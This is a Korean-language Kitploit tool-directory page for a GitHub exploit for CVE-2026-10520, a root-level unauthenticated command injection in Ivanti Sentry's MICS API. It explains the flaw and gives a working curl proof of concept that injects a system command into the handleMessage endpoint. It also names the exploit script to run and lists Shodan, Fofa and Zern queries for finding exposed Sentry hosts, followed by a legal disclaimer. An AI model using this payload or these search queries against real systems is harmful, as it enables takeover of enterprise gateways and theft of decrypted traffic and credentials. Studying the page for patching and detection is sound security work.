Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-10520 — Ivanti Sentry에서 OS 명령 삽입을 통한 루트 수준 RCE | Kitploit
도구/GitHubGitHub/error-inside/cve-2026-10520
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & Education
GitHuberror-inside/cve-2026-10520

CVE-2026-10520

Ivanti Sentry에서 OS 명령 삽입을 통한 루트 수준 RCE

저장소 보기
12개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-10520

Python CVSS License Educational

Ivanti Sentry (이전 명칭 MobileIron Sentry)는 모바일 디바이스와 기업 백엔드 리소스(이메일, SharePoint, 내부 웹 애플리케이션) 간의 트래픽을 프록시하는 엔터프라이즈 보안 게이트웨이입니다. 모바일 디바이스 관리(MDM) 정책을 시행하고, 암호화된 모바일 세션을 종료하며, 엔터프라이즈 앱 배포를 위한 인증서 기반 인증을 발급합니다. Sentry 인스턴스는 일반적으로 포트8443에서 인터넷에 노출되어 MICS(Mobile Iron Configuration Service) 관리 API를 제공합니다.

CVE-2026-10520은 Ivanti Sentry R10.5.2, R10.6.2, R10.7.1 이전 버전에 영향을 미치는 인증 없는 OS 명령 주입 취약점입니다(CVSSv3.1: 10 Critical, CISA KEV 등재). 이 결함은 MICS API 엔드포인트 /mics/api/v2/sentry/mics-config/handleMessage에 존재하며, 이 엔드포인트는 인증이나 입력 검증 없이 URL 인코딩된 message POST 본문을 통해 XML로 래핑된 시스템 명령을 수용합니다. 취약한 엔드포인트에 접근할 수 있는 공격자는 root 권한으로 임의의 OS 명령을 실행하여 호스트에 대한 완전한 제어권을 획득할 수 있습니다. 여기에는 복호화된 엔터프라이즈 트래픽, 저장된 자격 증명, 관리되는 모든 모바일 디바이스 데이터가 포함됩니다.

PoC

root@kitploit:~
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Connection: close" \
  --data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"

사용법

root@kitploit:~
python CVE-2026-10520-X7.py
  • Zern : title:"Ivanti System Manager: Sign In"
  • Fofa : body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"
  • Shodan : http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443

참고 자료

  • OpenCVE — Ivanti Sentry에서 OS 명령 주입을 통한 루트 수준 RCE
  • NIST — CVE-2026-10520 상세 정보
  • Ivanti Sentry — 공식 제품 페이지

면책 조항

이 리포지토리와 그 내용은 합법적인 보안 연구, 승인된 침투 테스트, 교육용 연구, 방어 목적으로만 제공됩니다. 이 자료를 접근하거나 사용함으로써 귀하는 귀하의 활동이 모든 관련 법률을 준수하고, 귀하가 소유하지 않은 시스템을 테스트하거나 이 기술을 적용하기 전에 적절한 승인을 받았음을 전적으로 인정합니다.

이 프로젝트의 저자와 유지관리자는 이 정보의 적용으로 인한 손해, 법적 결과 또는 오용에 대해 어떠한 책임도 지지 않습니다. 승인되지 않은 접근, 악의적인 활동 또는 불법적인 목적을 위한 사용은 명시적으로 금지되며 지원되지 않습니다.

책임 있게 사용하십시오. 합법을 유지하십시오. 귀하가 소유하거나 명시적인 서면 허가를 받은 시스템만 테스트하십시오.

작성자

  • ErrorInside // SCT

라이선스

SCT-PL

도구 다운로드